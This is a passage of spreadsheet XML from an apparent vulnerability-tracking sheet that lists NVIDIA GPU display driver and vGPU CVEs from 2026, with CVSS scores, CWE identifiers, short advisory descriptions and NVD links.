      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, or escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47505</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47507</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds array access. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47507</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47508</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an incorrect conversion between numeric types. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47508</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47510</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an integer overflow leading to an out-of-bounds write to GPU memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47510</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47511</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver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156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47511</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47512</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read leading to kernel information disclosure. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47512</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47513</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read from kernel heap memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47513</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47514</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause exposure of kernel stack contents including return addresses and pointers. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47514</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47516</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47516</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47519</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S161"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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47519</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47520</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S162"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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47520</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47521</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S163"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47521</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47523</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S164"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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47523</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47528</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-824</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an access of an uninitialized pointer. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47528</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47530</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S166"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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47530</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47535</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47535</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47536</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S168"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47536</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47540</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
